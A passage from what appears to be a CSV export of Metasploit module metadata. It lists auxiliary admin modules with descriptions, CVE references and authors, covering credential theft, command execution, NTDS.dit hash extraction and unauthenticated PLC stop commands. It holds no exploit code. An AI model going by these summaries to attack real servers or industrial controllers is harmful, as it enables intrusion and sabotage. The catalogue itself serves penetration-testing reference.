Framework License (BSD)","f","2009-02-10 00:00:00",,"Download","aggressive","t","CVE-2009-0815, EDB-8038, OSVDB-52048, URL-http://secunia.com/advisories/33829/, URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/","spinbad " 1146,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/typo3_sa_2010_020.rb","auxiliary","admin/http/typo3_sa_2010_020","auxiliary/admin/http/typo3_sa_2010_020","TYPO3 sa-2010-020 Remote File Disclosure",300,"This module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes. Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0. This flaw can be used to read any file that the web server user account has access to view.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://gregorkopf.de/slides_berlinsides_2010.pdf, URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020","Chris John Riley, Gregor Kopf" 1147,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb","auxiliary","admin/http/typo3_winstaller_default_enc_keys","auxiliary/admin/http/typo3_winstaller_default_enc_keys","TYPO3 Winstaller default Encryption Keys",300,"This module exploits known default encryption keys found in the TYPO3 Winstaller. This flaw allows for file disclosure in the jumpUrl mechanism. This issue can be used to read any file that the web server user account has access to view. The method used to create the juhash (short MD5 hash) was altered in later versions of Typo3. Use the show actions command to display and select the version of TYPO3 in use (defaults to the older method of juhash creation).","Metasploit Framework License (BSD)","f",,,"Short_MD5","aggressive","t","URL-http://typo3winstaller.sourceforge.net/","Chris John Riley" 1148,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb","auxiliary","admin/maxdb/maxdb_cons_exec","auxiliary/admin/maxdb/maxdb_cons_exec","SAP MaxDB cons.exe Remote Command Injection",300,"SAP MaxDB is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input.","Metasploit Framework License (BSD)","f","2008-01-09 00:00:00",,,"aggressive","t","BID-27206, CVE-2008-0244, OSVDB-40210","MC " 1149,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/misc/wol.rb","auxiliary","admin/misc/wol","auxiliary/admin/misc/wol","UDP Wake-On-Lan (WOL)",300,"This module will turn on a remote machine with a network card that supports wake-on-lan (or MagicPacket). In order to use this, you must know the machine's MAC address in advance. The current default MAC address is just an example of how your input should look like. The password field is optional. If present, it should be in this hex format: 001122334455, which is translated to ""0x001122334455"" in binary. Note that this should be either 4 or 6 bytes long.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"sinn3r " 1150,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/motorola/wr850g_cred.rb","auxiliary","admin/motorola/wr850g_cred","auxiliary/admin/motorola/wr850g_cred","Motorola WR850G v4.03 Credentials",300,"Login credentials to the Motorola WR850G router with firmware v4.03 can be obtained via a simple GET request if issued while the administrator is logged in. A lot more information is available through this request, but you can get it all and more after logging in.","Metasploit Framework License (BSD)","f","2004-09-24 00:00:00",,,"aggressive","t","CVE-2004-1550, OSVDB-10232, URL-http://seclists.org/bugtraq/2004/Sep/0339.html","kris katterjohn " 1151,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/ms/ms08_059_his2006.rb","auxiliary","admin/ms/ms08_059_his2006","auxiliary/admin/ms/ms08_059_his2006","Microsoft Host Integration Server 2006 Command Execution Vulnerability",300,"This module exploits a command-injection vulnerability in Microsoft Host Integration Server 2006.","Metasploit Framework License (BSD)","f","2008-10-14 00:00:00",,,"aggressive","t","CVE-2008-3466, MSB-MS08-059, OSVDB-49068, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=745","MC " 1152,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/mssql/mssql_enum.rb","auxiliary","admin/mssql/mssql_enum","auxiliary/admin/mssql/mssql_enum","Microsoft SQL Server Configuration Enumerator",300,"This module will perform a series of configuration audits and security checks against a Microsoft SQL Server database. For this module to work, valid administrative user credentials must be supplied.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Carlos Perez " 1153,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/mssql/mssql_exec.rb","auxiliary","admin/mssql/mssql_exec","auxiliary/admin/mssql/mssql_exec","Microsoft SQL Server xp_cmdshell Command Execution",300,"This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell procedure. A valid username and password is required to use this module","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx","tebo " 1154,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb","auxiliary","admin/mssql/mssql_findandsampledata","auxiliary/admin/mssql/mssql_findandsampledata","Microsoft SQL Server - Find and Sample Data",300,"This script will search through all of the non-default databases on the SQL Server for columns that match the keywords defined in the TSQL KEYWORDS option. If column names are found that match the defined keywords and data is present in the associated tables, the script will select a sample of the records from each of the affected tables. The sample size is determined by the SAMPLE_SIZE option, and results output in a CSV format.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.netspi.com/blog/author/ssutherland/","Carlos Perez , Robin Wood , Scott Sutherland , hdm , humble-desser , todb " 1155,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/mssql/mssql_idf.rb","auxiliary","admin/mssql/mssql_idf","auxiliary/admin/mssql/mssql_idf","Microsoft SQL Server - Interesting Data Finder",300,"This module will search the specified MSSQL server for 'interesting' columns and data. The module has been tested against SQL Server 2005 but it should also work on SQL Server 2008. The module will not work against SQL Server 2000 at this time, if you are interested in supporting this platform, please contact the author.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.digininja.org/metasploit/mssql_idf.php","Robin Wood " 1156,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb","auxiliary","admin/mssql/mssql_ntlm_stealer","auxiliary/admin/mssql/mssql_ntlm_stealer","Microsoft SQL Server NTLM Stealer",300,"This module can be used to help capture or relay the LM/NTLM credentials of the account running the remote SQL Server service. The module will use the supplied credentials to connect to the target SQL Server instance and execute the native ""xp_dirtree"" or ""xp_fileexist"" stored procedure. The stored procedures will then force the service account to authenticate to the system defined in the SMBProxy option. In order for the attack to be successful, the SMB capture or relay module must be running on the system defined as the SMBProxy. The database account used to connect to the database should only require the ""PUBLIC"" role to execute. Successful execution of this attack usually results in local administrative access to the Windows system. Specifically, this works great for relaying credentials between two SQL Servers using a shared service account to get shells. However, if the relay fails, then the LM hash can be reversed using the Halflm rainbow tables and john the ripper. Thanks to ""Sh2kerr"" who wrote the ora_ntlm_stealer for the inspiration.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://en.wikipedia.org/wiki/SMBRelay","nullbind " 1157,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb","auxiliary","admin/mssql/mssql_ntlm_stealer_sqli","auxiliary/admin/mssql/mssql_ntlm_stealer_sqli","Microsoft SQL Server NTLM Stealer - SQLi",300,"This module can be used to help capture or relay the LM/NTLM credentials of the account running the remote SQL Server service. The module will use the SQL injection from GET_PATH to connect to the target SQL Server instance and execute the native ""xp_dirtree"" or stored procedure. The stored procedures will then force the service account to authenticate to the system defined in the SMBProxy option. In order for the attack to be successful, the SMB capture or relay module must be running on the system defined as the SMBProxy. The database account used to connect to the database should only require the ""PUBLIC"" role to execute. Successful execution of this attack usually results in local administrative access to the Windows system. Specifically, this works great for relaying credentials between two SQL Servers using a shared service account to get shells. However, if the relay fails, then the LM hash can be reversed using the Halflm rainbow tables and john the ripper.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://en.wikipedia.org/wiki/SMBRelay","Antti , nullbind " 1158,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/mssql/mssql_sql.rb","auxiliary","admin/mssql/mssql_sql","auxiliary/admin/mssql/mssql_sql","Microsoft SQL Server Generic Query",300,"This module will allow for simple SQL statements to be executed against a MSSQL/MSDE instance given the appropiate credentials.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx, URL-http://www.attackresearch.com","tebo " 1159,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/mssql/mssql_sql_file.rb","auxiliary","admin/mssql/mssql_sql_file","auxiliary/admin/mssql/mssql_sql_file","Microsoft SQL Server Generic Query from File",300,"This module will allow for multiple SQL queries contained within a specified file to be executed against a Microsoft SQL (MSSQL) Server instance, given the appropiate credentials.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"j0hn__f : " 1160,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/mysql/mysql_enum.rb","auxiliary","admin/mysql/mysql_enum","auxiliary/admin/mysql/mysql_enum","MySQL Enumeration Module",300,"This module allows for simple enumeration of MySQL Database Server provided proper credentials to connect remotely.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-https://cisecurity.org/benchmarks.html","Carlos Perez " 1161,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/mysql/mysql_sql.rb","auxiliary","admin/mysql/mysql_sql","auxiliary/admin/mysql/mysql_sql","MySQL SQL Generic Query",300,"This module allows for simple SQL statements to be executed against a MySQL instance given the appropriate credentials.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Bernardo Damele A. G. " 1162,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/natpmp/natpmp_map.rb","auxiliary","admin/natpmp/natpmp_map","auxiliary/admin/natpmp/natpmp_map","NAT-PMP Port Mapper",300,"Map (forward) TCP and UDP ports on NAT devices using NAT-PMP","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Jon Hart " 1163,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/officescan/tmlisten_traversal.rb","auxiliary","admin/officescan/tmlisten_traversal","auxiliary/admin/officescan/tmlisten_traversal","TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access",300,"This module tests for directory traversal vulnerability in the UpdateAgent function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro OfficeScan. This allows remote attackers to read arbitrary files as SYSTEM via dot dot sequences in an HTTP request.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-31531, CVE-2008-2439, OSVDB-48730, URL-http://www.trendmicro.com/ftp/documentation/readme/OSCE_7.3_Win_EN_CriticalPatch_B1372_Readme.txt","Anshul Pandey , patrick " 1164,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb","auxiliary","admin/oracle/ora_ntlm_stealer","auxiliary/admin/oracle/ora_ntlm_stealer","Oracle SMB Relay Code Execution",300,"This module will help you to get Administrator access to OS using an unprivileged Oracle database user (you need only CONNECT and RESOURCE privileges). To do this you must firstly run smb_sniffer or smb_relay module on your sever. Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb which will connect to your SMB sever with credentials of Oracle RDBMS. So if smb_relay is working, you will get Administrator access to server which runs Oracle. If not than you can decrypt HALFLM hash.","Metasploit Framework License (BSD)","f","2009-04-07 00:00:00",,,"aggressive","t","URL-http://dsecrg.com/pages/pub/show.php?id=17","Sh2kerr " 1165,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/oracle/oracle_login.rb","auxiliary","admin/oracle/oracle_login","auxiliary/admin/oracle/oracle_login","Oracle Account Discovery",300,"This module uses a list of well known default authentication credentials to discover easily guessed accounts.","Metasploit Framework License (BSD)","f","2008-11-20 00:00:00",,,"aggressive","t","URL-http://seclists.org/fulldisclosure/2009/Oct/261, URL-http://www.petefinnigan.com/default/oracle_default_passwords.csv","MC " 1166,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/oracle/oracle_sql.rb","auxiliary","admin/oracle/oracle_sql","auxiliary/admin/oracle/oracle_sql","Oracle SQL Generic Query",300,"This module allows for simple SQL statements to be executed against a Oracle instance given the appropriate credentials and sid.","Metasploit Framework License (BSD)","f","2007-12-07 00:00:00",,,"aggressive","t","URL-https://www.metasploit.com/users/mc","MC " 1167,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/oracle/oraenum.rb","auxiliary","admin/oracle/oraenum","auxiliary/admin/oracle/oraenum","Oracle Database Enumeration",300,"This module provides a simple way to scan an Oracle database server for configuration parameters that may be useful during a penetration test. Valid database credentials must be provided for this module to run.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Carlos Perez " 1168,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/oracle/osb_execqr.rb","auxiliary","admin/oracle/osb_execqr","auxiliary/admin/oracle/osb_execqr","Oracle Secure Backup exec_qr() Command Injection Vulnerability",300,"This module exploits a command injection vulnerablility in Oracle Secure Backup version 10.1.0.3 to 10.2.0.2.","Metasploit Framework License (BSD)","f","2009-01-14 00:00:00",,,"aggressive","t","CVE-2008-5448, OSVDB-51342, URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-003","MC " 1169,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/oracle/osb_execqr2.rb","auxiliary","admin/oracle/osb_execqr2","auxiliary/admin/oracle/osb_execqr2","Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability",300,"This module exploits an authentication bypass vulnerability in login.php in order to execute arbitrary code via a command injection vulnerability in property_box.php. This module was tested against Oracle Secure Backup version 10.3.0.1.0 (Win32).","Metasploit Framework License (BSD)","f","2009-08-18 00:00:00",,,"aggressive","t","CVE-2009-1977, CVE-2009-1978, OSVDB-55903, OSVDB-55904, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-058, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-059","MC " 1170,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/oracle/osb_execqr3.rb","auxiliary","admin/oracle/osb_execqr3","auxiliary/admin/oracle/osb_execqr3","Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability",300,"This module exploits an authentication bypass vulnerability in login.php in order to execute arbitrary code via a command injection vulnerability in property_box.php. This module was tested against Oracle Secure Backup version 10.3.0.1.0 (Win32).","Metasploit Framework License (BSD)","f","2010-07-13 00:00:00",,,"aggressive","t","CVE-2010-0904, OSVDB-66338, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-118","MC " 1171,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb","auxiliary","admin/oracle/post_exploitation/win32exec","auxiliary/admin/oracle/post_exploitation/win32exec","Oracle Java execCommand (Win32)",300,"This module will create a java class which enables the execution of OS commands.","Metasploit Framework License (BSD)","f","2007-12-07 00:00:00",,,"aggressive","t","URL-https://www.metasploit.com/users/mc","MC " 1172,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb","auxiliary","admin/oracle/post_exploitation/win32upload","auxiliary/admin/oracle/post_exploitation/win32upload","Oracle URL Download",300,"This module will create a java class which enables the download of a binary from a webserver to the oracle filesystem.","Metasploit Framework License (BSD)","f","2005-02-10 00:00:00",,,"aggressive","t","URL-http://www.argeniss.com/research/oraclesqlinj.zip","CG " 1173,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/oracle/sid_brute.rb","auxiliary","admin/oracle/sid_brute","auxiliary/admin/oracle/sid_brute","Oracle TNS Listener SID Brute Forcer",300,"This module simply attempts to discover the protected SID.","Metasploit Framework License (BSD)","f","2009-01-07 00:00:00",,,"aggressive","t","URL-http://www.red-database-security.com/scripts/sid.txt, URL-https://www.metasploit.com/users/mc","MC " 1174,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/oracle/tnscmd.rb","auxiliary","admin/oracle/tnscmd","auxiliary/admin/oracle/tnscmd","Oracle TNS Listener Command Issuer",300,"This module allows for the sending of arbitrary TNS commands in order to gather information. Inspired from tnscmd.pl from www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd","Metasploit Framework License (BSD)","f","2009-02-01 00:00:00",,,"aggressive","t",,"MC " 1175,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/pop2/uw_fileretrieval.rb","auxiliary","admin/pop2/uw_fileretrieval","auxiliary/admin/pop2/uw_fileretrieval","UoW pop2d Remote File Retrieval Vulnerability",300,"This module exploits a vulnerability in the FOLD command of the University of Washington ipop2d service. By specifying an arbitrary folder name it is possible to retrieve any file which is world or group readable by the user ID of the POP account. This vulnerability can only be exploited with a valid username and password. The From address is the file owner.","Metasploit Framework License (BSD)","f","2000-07-14 00:00:00",,,"aggressive","t","BID-1484, OSVDB-368","patrick " 1176,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/postgres/postgres_readfile.rb","auxiliary","admin/postgres/postgres_readfile","auxiliary/admin/postgres/postgres_readfile","PostgreSQL Server Generic Query",300,"This module imports a file local on the PostgreSQL Server into a temporary table, reads it, and then drops the temporary table. It requires PostgreSQL credentials with table CREATE privileges as well as read privileges to the target file.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://michaeldaw.org/sql-injection-cheat-sheet#postgres","todb " 1177,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/postgres/postgres_sql.rb","auxiliary","admin/postgres/postgres_sql","auxiliary/admin/postgres/postgres_sql","PostgreSQL Server Generic Query",300,"This module will allow for simple SQL statements to be executed against a PostgreSQL instance given the appropiate credentials.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-www.postgresql.org","todb " 1178,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb","auxiliary","admin/sap/sap_configservlet_exec_noauth","auxiliary/admin/sap/sap_configservlet_exec_noauth","SAP ConfigServlet OS Command Execution",300,"This module allows execution of operating system commands through the SAP ConfigServlet without any authentication.","Metasploit Framework License (BSD)","f","2012-11-01 00:00:00",,,"aggressive","t","EDB-24963, OSVDB-92704, URL-http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf","Andras Kabai, Dmitry Chastuhin" 1179,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb","auxiliary","admin/sap/sap_mgmt_con_osexec","auxiliary/admin/sap/sap_mgmt_con_osexec","SAP Management Console OSExecute",300,"This module allows execution of operating system commands through the SAP Management Console SOAP Interface. A valid username and password must be provided.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley" 1180,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/scada/igss_exec_17.rb","auxiliary","admin/scada/igss_exec_17","auxiliary/admin/scada/igss_exec_17","Interactive Graphical SCADA System Remote Command Injection",300,"This module abuses a directory traversal flaw in Interactive Graphical SCADA System v9.00. In conjunction with the traversal flaw, if opcode 0x17 is sent to the dc.exe process, an attacker may be able to execute arbitrary system commands.","Metasploit Framework License (BSD)","f","2011-03-21 00:00:00",,,"aggressive","t","CVE-2011-1566, OSVDB-72349, URL-http://aluigi.org/adv/igss_8-adv.txt","Luigi Auriemma, MC " 1181,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/scada/modicon_command.rb","auxiliary","admin/scada/modicon_command","auxiliary/admin/scada/modicon_command","Schneider Modicon Remote START/STOP Command",300,"The Schneider Modicon with Unity series of PLCs use Modbus function code 90 (0x5a) to perform administrative commands without authentication. This module allows a remote user to change the state of the PLC between STOP and RUN, allowing an attacker to end process control by the PLC. This module is based on the original 'modiconstop.rb' Basecamp module from DigitalBond.","Metasploit Framework License (BSD)","f","2012-04-05 00:00:00",,,"aggressive","t","URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/","K. Reid Wightman , todb " 1182,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/scada/modicon_password_recovery.rb","auxiliary","admin/scada/modicon_password_recovery","auxiliary/admin/scada/modicon_password_recovery","Schneider Modicon Quantum Password Recovery",300,"The Schneider Modicon Quantum series of Ethernet cards store usernames and passwords for the system in files that may be retrieved via backdoor access. This module is based on the original 'modiconpass.rb' Basecamp module from DigitalBond.","Metasploit Framework License (BSD)","f","2012-01-19 00:00:00",,,"aggressive","t","URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/","K. Reid Wightman , todb " 1183,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/scada/modicon_stux_transfer.rb","auxiliary","admin/scada/modicon_stux_transfer","auxiliary/admin/scada/modicon_stux_transfer","Schneider Modicon Ladder Logic Upload/Download",300,"The Schneider Modicon with Unity series of PLCs use Modbus function code 90 (0x5a) to send and receive ladder logic. The protocol is unauthenticated, and allows a rogue host to retrieve the existing logic and to upload new logic. Two modes are supported: ""SEND"" and ""RECV,"" which behave as one might expect -- use 'set mode ACTIONAME' to use either mode of operation. In either mode, FILENAME must be set to a valid path to an existing file (for SENDing) or a new file (for RECVing), and the directory must already exist. The default, 'modicon_ladder.apx' is a blank ladder logic file which can be used for testing. This module is based on the original 'modiconstux.rb' Basecamp module from DigitalBond.","Metasploit Framework License (BSD)","f","2012-04-05 00:00:00",,,"aggressive","t","URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/","K. Reid Wightman , todb " 1184,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/scada/multi_cip_command.rb","auxiliary","admin/scada/multi_cip_command","auxiliary/admin/scada/multi_cip_command","Allen-Bradley/Rockwell Automation EtherNet/IP CIP Commands",300,"The EtnerNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which implements the protocol. This module implements the CPU STOP command, as well as the ability to crash the Ethernet card in an affected device. This module is based on the original 'ethernetip-multi.rb' Basecamp module from DigitalBond.","Metasploit Framework License (BSD)","f","2012-01-19 00:00:00",,,"aggressive","t","URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/","K. Reid Wightman , Ruben Santamarta , todb " 1185,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/serverprotect/file.rb","auxiliary","admin/serverprotect/file","auxiliary/admin/serverprotect/file","TrendMicro ServerProtect File Access",300,"This modules exploits a remote file access flaw in the ServerProtect Windows Server RPC service. Please see the action list (or the help output) for more information.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2007-6507, OSVDB-44318, URL-http://www.zerodayinitiative.com/advisories/ZDI-07-077.html","toto" 1186,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/smb/check_dir_file.rb","auxiliary","admin/smb/check_dir_file","auxiliary/admin/smb/check_dir_file","SMB Scanner Check File/Directory Utility",300,"This module is useful when checking an entire network of SMB hosts for the presence of a known file or directory. An example would be to scan all systems for the presence of antivirus or known malware outbreak. Typically you must set RPATH, SMBUser, SMBDomain and SMBPass to operate correctly.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"patrick " 1187,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/smb/list_directory.rb","auxiliary","admin/smb/list_directory","auxiliary/admin/smb/list_directory","SMB Directory Listing Utility",300,"This module lists the directory of a target share and path. The only reason to use this module is if your existing SMB client is not able to support the features of the Metasploit Framework that you need, like pass-the-hash authentication.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , mubix " 1188,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/smb/psexec_command.rb","auxiliary","admin/smb/psexec_command","auxiliary/admin/smb/psexec_command","Microsoft Windows Authenticated Command Execution",300,"This module uses a valid administrator username and password to execute an arbitrary command on one or more hosts, using a similar technique than the ""psexec"" utility provided by SysInternals. Daisy chaining commands with '&' does not work and users shouldn't try it. This module is useful because it doesn't need to upload any binaries to the target machine.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0504, OSVDB-3106, URL-http://sourceforge.net/projects/smbexec/, URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx, URL-http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access","Royce Davis @R3dy__ " 1189,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb","auxiliary","admin/smb/psexec_ntdsgrab","auxiliary/admin/smb/psexec_ntdsgrab","PsExec NTDS.dit And SYSTEM Hive Download Utility",300,"This module authenticates to an Active Directory Domain Controller and creates a volume shadow copy of the %SYSTEMDRIVE%. It then pulls down copies of the ntds.dit file as well as the SYSTEM hive and stores them. The ntds.dit and SYSTEM hive copy can be used in combination with other tools for offline extraction of AD password hashes. All of this is done without uploading a single binary to the target host.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://sourceforge.net/projects/smbexec, URL-http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access","Royce Davis " 1190,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/smb/samba_symlink_traversal.rb","auxiliary","admin/smb/samba_symlink_traversal","auxiliary/admin/smb/samba_symlink_traversal","Samba Symlink Directory Traversal",300,"This module exploits a directory traversal flaw in the Samba CIFS server. To exploit this flaw, a writeable share must be specified. The newly created directory will link to the root filesystem.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","OSVDB-62145, URL-http://www.samba.org/samba/news/symlink_attack.html","hdm , kcope" 1191,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/smb/upload_file.rb","auxiliary","admin/smb/upload_file","auxiliary/admin/smb/upload_file","SMB File Upload Utility",300,"This module uploads a file to a target share and path. The only reason to use this module is if your existing SMB client is not able to support the features of the Metasploit Framework that you need, like pass-the-hash authentication.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1192,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb","auxiliary","admin/sunrpc/solaris_kcms_readfile","auxiliary/admin/sunrpc/solaris_kcms_readfile","Solaris KCMS + TTDB Arbitrary File Read",300,"This module targets a directory traversal vulnerability in the kcms_server component from the Kodak Color Management System. By utilizing the ToolTalk Database Server\'s TT_ISBUILD procedure, an attacker can bypass existing directory traversal validation and read arbitrary files. Vulnerable systems include Solaris 2.5 - 9 SPARC and x86. Both kcms_server and rpc.ttdbserverd must be running on the target host.","Metasploit Framework License (BSD)","f","2003-01-22 00:00:00",,,"aggressive","t","BID-6665, CVE-2003-0027, OSVDB-8201, URL-http://marc.info/?l=bugtraq&m=104326556329850&w=2, URL-http://sunsolve.sun.com/search/document.do?assetkey=1-77-1000898.1-1","jduck , vlad902 " 1193,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/tftp/tftp_transfer_util.rb","auxiliary","admin/tftp/tftp_transfer_util","auxiliary/admin/tftp/tftp_transfer_util","TFTP File Transfer Utility",300,"This module will transfer a file to or from a remote TFTP server. Note that the target must be able to connect back to the Metasploit system, and NAT traversal for TFTP is often unsupported. Two actions are supported: ""Upload"" and ""Download,"" which behave as one might expect -- use 'set action Actionname' to use either mode of operation. If ""Download"" is selected, at least one of FILENAME or REMOTE_FILENAME must be set. If ""Upload"" is selected, either FILENAME must be set to a valid path to a source file, or FILEDATA must be populated. FILENAME may be a fully qualified path, or the name of a file in the Msf::Config.local_directory or Msf::Config.data_directory.","Metasploit Framework License (BSD)","f",,,"Upload","aggressive","t","URL-http://www.faqs.org/rfcs/rfc1350.html, URL-http://www.networksorcery.com/enp/protocol/tftp.htm","todb " 1194,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/tikiwiki/tikidblib.rb","auxiliary","admin/tikiwiki/tikidblib","auxiliary/admin/tikiwiki/tikidblib","TikiWiki Information Disclosure",300,"A vulnerability has been reported in Tikiwiki, which can be exploited by a anonymous user to dump the MySQL user & passwd just by creating a mysql error with the ""sort_mode"" var. The vulnerability was reported in Tikiwiki version 1.9.5.","Metasploit Framework License (BSD)","f","2006-11-01 00:00:00",,"Download","aggressive","t","BID-20858, CVE-2006-5702, OSVDB-30172, URL-http://secunia.com/advisories/22678/","Matteo Cantoni " 1195,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/vmware/poweroff_vm.rb","auxiliary","admin/vmware/poweroff_vm","auxiliary/admin/vmware/poweroff_vm","VMWare Power Off Virtual Machine",300,"This module will log into the Web API of VMWare and try to power off a specified Virtual Machine.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"theLightCosine " 1196,"2013-05-07 